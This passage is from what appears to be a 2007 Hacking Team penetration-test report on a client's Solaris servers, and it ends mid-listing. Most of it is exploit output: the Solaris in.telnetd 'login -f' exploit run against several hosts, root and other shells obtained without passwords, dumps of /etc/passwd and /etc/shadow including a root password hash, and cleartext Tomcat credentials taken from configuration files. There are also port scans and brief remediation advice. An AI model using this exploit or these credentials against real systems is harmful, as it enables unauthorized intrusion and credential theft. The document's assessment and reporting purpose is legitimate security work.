Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
The host 192.168.254.182 has an outdated Solaris version, the supplied telnetd server calls login with
unescaped arguments allowing a remote user to login with any user, root, bin and softsol included, without
supplying a valid password, it was possible to read clear tomcat and softsol passwords:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 79 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$ ./scan 192.168.254.182 root
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.182...
Connected to 192.168.254.182.
Escape character is '^]'.
Not on system console
Connection closed by foreign host.
$ ./scan 192.168.254.182 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.182...
Connected to 192.168.254.182.
Escape character is '^]'.
Last login: Wed Jul 18 17:17:54 from 100.100.200.87
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$ uname
SunOS
$ uptime
5:18pm up 241 day(s), 22:04, 1 user, load average: 0.24, 0.14, 0.12
$
$ cat /etc/shadow
cat: cannot open /etc/shadow
$ cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 80 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
softsol:x:100:100:Softsolutions! Developer:/export/home/softsol:/usr/bin/bash
$ ls -la /etc/shadow
-r-------- 1 root sys 438 Nov 10 2006 /etc/shadow
bash-3.00$ /usr/sbin/prtconf -D|grep net
prtconf: devinfo facility not available
bash-3.00$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 767 746 0 Nov 18 ? 5:16 /lib/svc/bin/svc.startd
nobody 5363 1261 0 04:38:49 ? 0:00 /usr/openwin/bin/xfs
root 5376 746 0 04:38:55 ? 2:11 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
root 746 746 0 Nov 18 ? 0:00 zsched
root 773 746 0 Nov 18 ? 5:12 /lib/svc/bin/svc.configd
root 764 746 0 Nov 18 ? 1:03 /sbin/init
root 1266 746 0 Nov 18 ? 0:43 /usr/lib/utmpd
root 1234 746 0 Nov 18 ? 0:06 /usr/sbin/cron
daemon 1248 746 0 Nov 18 ? 0:00 /usr/lib/nfs/statd
daemon 1243 746 0 Nov 18 ? 0:00 /usr/sbin/rpcbind
root 1265 1258 0 Nov 18 ? 0:08 /usr/lib/saf/ttymon
root 1261 746 0 Nov 18 ? 5:10 /usr/lib/inet/inetd start
daemon 1254 746 0 Nov 18 ? 0:00 /usr/lib/nfs/lockd
root 1168 746 0 Nov 18 ? 17:00 /usr/sbin/nscd
daemon 1169 746 0 Nov 18 ? 101:38 /usr/lib/crypto/kcfd
root 1268 767 0 Nov 18 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
root 1258 767 0 Nov 18 ? 0:08 /usr/lib/saf/sac -t 300
root 1730 746 0 Nov 18 ? 0:04 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
softsol 8687 746 0 06:00:01 ? 16:38 /opt/java/bin/java -Djava
.util.logging.manager=org.apache.juli.ClassLoaderLogMa
root 9917 1261 0 17:18:10 ? 0:00 /usr/sbin/in.telnetd
bin 9920 9917 0 17:18:10 pts/4 0:00 -sh
root 1505 746 0 Nov 18 ? 1:20 /usr/lib/autofs/automountd
smmsp 1543 746 0 Nov 18 ? 2:01 /usr/lib/sendmail -Ac -q15m
root 1532 746 0 Nov 18 ? 0:39 /usr/sbin/syslogd
root 1525 746 0 Nov 18 ? 5:33 /usr/lib/ssh/sshd
root 1544 746 0 Nov 18 ? 11:33 /usr/lib/sendmail -bd -q15m
root 1764 746 0 Nov 18 ? 6:02 /usr/sfw/sbin/snmpd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 81 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 1743 746 0 Nov 18 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsdfeedas3
root 1593 746 0 Nov 18 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 1741 746 0 Nov 18 ? 0:00 /usr/lib/dmi/dmispd
bin 9956 9931 0 17:21:18 pts/4 0:00 ps -ef
bin 9931 9920 0 17:19:13 pts/4 0:00 bash
bash-3.00$ find ./ | grep tomcat-users.xml
./tomcat-5.5.17/conf/tomcat-users.xml
./tomcat-5.5.20/conf/tomcat-users.xml
bash-3.00$ cat ./tomcat-5.5.17/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="manager"/>
<user username="softsol" password="softsol" roles="manager"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
bash-3.00$ ls -la ./tomcat-5.5.20/conf/tomcat-users.xml
-rw------- 1 softsol tomcat 440 Sep 12 2006 ./tomcat-
5.5.20/conf/tomcat-users.xml
$ ./scan 192.168.254.182 softsol
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.182...
Connected to 192.168.254.182.
Escape character is '^]'.
Last login: Wed Jul 18 11:45:59 from 10.35.239.129
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[softsol@mtsdfeedas3 ~]$cd /opt/
[softsol@mtsdfeedas3 opt]$ls
@LongLink SUNWits SUNWmlib SUNWrtvc SUNWsneep java
jdk1.5.0_09 tomcat tomcat-5.5.17 tomcat-5.5.20
[softsol@mtsdfeedas3 opt]$cat ./tomcat-5.5.20/conf/tomcat-users.xml
<!--
NOTE: By default, no user is included in the "manager" role required
to operate the "/manager" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
-->
<tomcat-users>
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 82 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
<user name="tomcat" password="tomcat" roles="tomcat" />
<user name="role1" password="tomcat" roles="role1" />
<user name="both" password="tomcat" roles="tomcat,role1" />
</tomcat-users>
bash-3.00$ /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
bash-3.00$ cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
bash-3.00$ /sbin/ifconfig -a | grep net
inet 127.0.0.1 netmask ff000000
inet 192.168.254.182 netmask ffffff00 broadcast 192.168.254.255
The host 192.168.254.184 has an outdated Solaris version, the supplied telnetd server calls login with
unescaped arguments allowing a remote user to login with any user, bin included, without supplying a valid
password, it was possible to read clear tomcat and softsol passwords:
$ ./scan 192.168.254.184 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.184...
Connected to 192.168.254.184.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$ uname -a
SunOS mtsvaddsas1 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
$ hostname
mtsvaddsas1
$ /sbin/ifconfig -a
lo0:2: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232
index 1
inet 127.0.0.1 netmask ff000000
ipge2:1: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 4
inet 192.168.254.184 netmask ffffff00 broadcast 192.168.254.255
$
bash-3.00$ cat /etc/passwd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 83 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
softsol:x:100:100:SoftSolutions! developers:/export/home/softsol:/usr/bin/bash
bash-3.00$ cat /etc/shadow
cat: cannot open /etc/shadow
bash-3.00$ get
getconf getdev getdgrp getent getfacl getopt getopts gettext gettxt
getvol
bash-3.00$ getent passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
softsol:x:100:100:SoftSolutions! developers:/export/home/softsol:/usr/bin/bash
bash-3.00$ find ./ | grep -i tomcat-users.xml
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 84 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
./tomcat-4.1.34/conf/tomcat-users.xml
./tomcat-5.5.20/conf/tomcat-users.xml
bash-3.00$ cat ./tomcat-4.1.34/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="manager"/>
<user username="softsol" password="softsol" roles="manager"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
bash-3.00$ cat ./tomcat-5.5.20/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="manager"/>
<user username="softsol" password="softsol" roles="manager"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
bash-3.00$
$ /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
$ cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
6.3.6 192.168.254.61, 192.168.254.150, 192.168.254.152, 192.168.254.154, 192.168.254.170,
192.168.254.181, 192.168.254.183, 192.168.254.185 [Compromised]
Rating: compromised
Vulnerabilities found: V5, V6, for 192.168.254.150, 192.168.254.154, 192.168.254.170, 192.168.254.181,
192.168.254.183 and 192.168.254.185 also V4
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates; disable the cleartext telnet/ftp services or replace them with
telnets/ssh/ftps
Discovery method ICMP Echo Ping on Initial scan
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 85 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Netra T1 105
Hostname MTSAPPSRV02 MTSMYSQLMGMT, MTSMYSQLDATA2,
MTSMYSQLAPI2, MTSINNERFTP1,
MTSDFEEDAS2, MTSDFEEDAS4,
MTSVADDSAS2
Compromised Compromised Directly Info Telnet calling login -f
Auth -froot
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open gsql_trn 1 (rpc #1073741840)
32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open ttdbserverd 1 (rpc #100083)
32779/tcp open sometimes-rpc21?
32780/tcp open sometimes-rpc23?
Uptime: 241.443 days (since Sat Nov 18 18:41:44 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=157 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsappsrv02, mtsappsrv02.; OSs: Solaris, Unix
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 86 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
150
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
111/tcp open rpcbind 2-4 (rpc #100000)
898/tcp open sun-manageconsole?
4045/tcp open nlockmgr 1-4 (rpc #100021)
Uptime: 241.450 days (since Sat Nov 18 18:41:44 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
154
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
111/tcp open rpcbind 2-4 (rpc #100000)
898/tcp open sun-manageconsole?
3306/tcp open mysql MySQL (unauthorized)
4045/tcp open nlockmgr 1-4 (rpc #100021)
Uptime: 241.451 days (since Sat Nov 18 18:41:44 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
170
21/tcp open ftp ProFTPD
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((Unix) DAV/2)
111/tcp open rpcbind 2-4 (rpc #100000)
4045/tcp open nlockmgr 1-4 (rpc #100021)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 87 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Uptime: 241.455 days (since Sat Nov 18 18:41:45 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
181
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
111/tcp open rpcbind 2-4 (rpc #100000)
4045/tcp open nlockmgr 1-4 (rpc #100021)
Uptime: 241.456 days (since Sat Nov 18 18:41:44 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Host: mtsdfeedas2; OS: Solaris
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
183
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 88 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
Uptime: 241.458 days (since Sat Nov 18 18:41:44 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdfeedas4, mtsdfeedas4.mtsgroup.org; OSs: Solaris, Unix
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
185
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
32787/tcp open status 1 (rpc #100024)
Uptime: 241.460 days (since Sat Nov 18 18:41:44 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsvaddsas2, mtsvaddsas2.mtsgroup.org; OSs: Solaris, Unix
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 89 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The host 192.168.254.61 has an outdated Solaris version, the supplied telnetd server calls login
with unescaped arguments allowing a remote user to login with any user, root included, without
supplying a valid password:
$ ./scan 192.168.254.61 root
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.61...
Connected to 192.168.254.61.
Escape character is '^]'.
Last login: Fri Jul 13 18:31:28 from lmeneghesso.mts
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
root@mtsappsrv02 #
root@mtsappsrv02 # id
uid=0(root) gid=0(root)
root@mtsappsrv02 # uname -a
SunOS mtsappsrv02 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
root@mtsappsrv02 # ls
bin dev etc home lib mnt opt
proc sbin tmp var zones
cdrom devices export kernel lost+found net platform
rmdisk system usr vol
root@mtsappsrv02 # uptime
3:13pm up 241 day(s), 21:10, 2 users, load average: 0.04, 0.04, 0.03
root@mtsappsrv02 # w
3:13pm up 241 day(s), 21:10, 2 users, load average: 0.04, 0.04, 0.03
User tty login@ idle JCPU PCPU what
root console 18Nov06242days 1 bash
root pts/2 3:12pm w
root@mtsappsrv02 # cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 90 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsappsrv02 # cat /etc/shadow
root:$2a$04$AY.BSV30edfCpYdnSo73Hu90J0GOBH.PwZAygd70dW9iU.SSwNb.y:13369::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
root@mtsappsrv02 # cat /etc/security/crypt.conf
#
# Copyright 2002 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
#ident "@(#)crypt.conf 1.1 02/06/07 SMI"
#
# The algorithm name __unix__ is reserved.
1 crypt_bsdmd5.so.1
2a crypt_bsdbf.so.1
md5 crypt_sunmd5.so.1
# The Solaris default is the traditional UNIX algorithm. This is not
# listed in crypt.conf(4) since it is internal to libc. The reserved
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 91 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
# name __unix__ is used to refer to it.
#
CRYPT_DEFAULT=2a
root@mtsappsrv02 # getent passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsappsrv02 # ps -ef | grep -i mysql
root 17850 17773 0 15:27:49 pts/2 0:00 grep -i mysql
root 13399 1 0 Jun 08 ? 0:01 zoneadmd -z mysqlapi2
root 3224 1 0 Jun 11 ? 0:00 /bin/sh
/opt/MTSWeb/MySQLCluster/bin/mysqld_Safe --user=mysql
0000100 3295 3275 0 Jun 11 ? 70:06
/opt/MTSWeb/MySQLCluster/libexec/mysqld --basedir=/opt/MTSWeb/MySQLCluster --da
0000100 3244 3224 0 Jun 11 ? 70:28
/opt/MTSWeb/MySQLCluster/libexec/mysqld --basedir=/opt/MTSWeb/MySQLCluster --da
root 8693 1 0 Jun 08 ? 0:01 zoneadmd -z mysqldata2
root 9618 1 0 Jun 08 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsmysqldata2
root 3275 1 0 Jun 11 ? 0:00 /bin/sh
/opt/MTSWeb/MySQLCluster/bin/mysqld_Safe --user=mysql
root 14413 1 0 Jun 08 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsmysqlapi2
root 17979 1 0 Jun 08 ? 0:01 zoneadmd -z mysqlmgmt
root 19033 1 0 Jun 08 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsmysqlmgmt
root@mtsappsrv02 # prtconf -D|grep net
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 92 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
network, instance #0 (driver name: ipge)
network, instance #1 (driver name: ipge)
network, instance #2 (driver name: ipge)
network, instance #3 (driver name: ipge)
root@mtsappsrv02 # hostname
mtsappsrv02
root@mtsappsrv02 # uname -a
SunOS mtsappsrv02 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
root@mtsappsrv02 # /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
root@mtsappsrv02 # cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
root@mtsappsrv02 # ifconfig -a | grep net
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 192.168.254.61 netmask ffffff00 broadcast 192.168.254.255
inet 0.0.0.0 netmask 0
inet 192.168.254.181 netmask ffffff00 broadcast 192.168.254.255
inet 192.168.254.154 netmask ffffff00 broadcast 192.168.254.255
inet 192.168.254.150 netmask ffffff00 broadcast 192.168.254.255
inet 0.0.0.0 netmask 0
inet 192.168.254.152 netmask ffffff00 broadcast 192.168.254.255
inet 0.0.0.0 netmask 0
inet 192.168.254.183 netmask ffffff00 broadcast 192.168.254.255
inet 192.168.254.185 netmask ffffff00 broadcast 192.168.254.255
inet 192.168.254.170 netmask ffffff00 broadcast 192.168.254.255
root@mtsappsrv02 # ls
bin dev etc home lib mnt opt
proc sbin tmp var zones
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 93 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
cdrom devices export kernel lost+found net platform
rmdisk system usr vol
root@mtsappsrv02 # cd zones/
dfeedas2/ dfeedas4/ innerftp1/ lost+found/ mysqlapi2/ mysqldata2/
mysqlmgmt/ vaddsas2/
root@mtsappsrv02 # cd dfeedas
dfeedas2/ dfeedas4/
root@mtsappsrv02 # cd dfeedas
dfeedas2/ dfeedas4/
root@mtsappsrv02 # cd dfeedas2/
root@mtsappsrv02 # ls
dev root
root@mtsappsrv02 # cd root/
root@mtsappsrv02 # ls
bin dev etc export home lib mnt net
opt platform proc sbin system tmp usr var
The host 192.168.254.183 has an outdated Solaris version, the supplied telnetd server calls login
with unescaped arguments allowing a remote user to login with any user, root, softsol and bin
included, without supplying a valid password. It was also possible to read tomcat and softsol
cleartext passwords:
$ ./scan 192.168.254.183 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.183...
Connected to 192.168.254.183.
Escape character is '^]'.
Last login: Wed Jul 18 18:05:00 from 100.100.200.87
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ cat /et s^H^C
$ bash
bash-3.00$ cat /etc/shadow
cat: cannot open /etc/shadow
bash-3.00$ cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 94 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
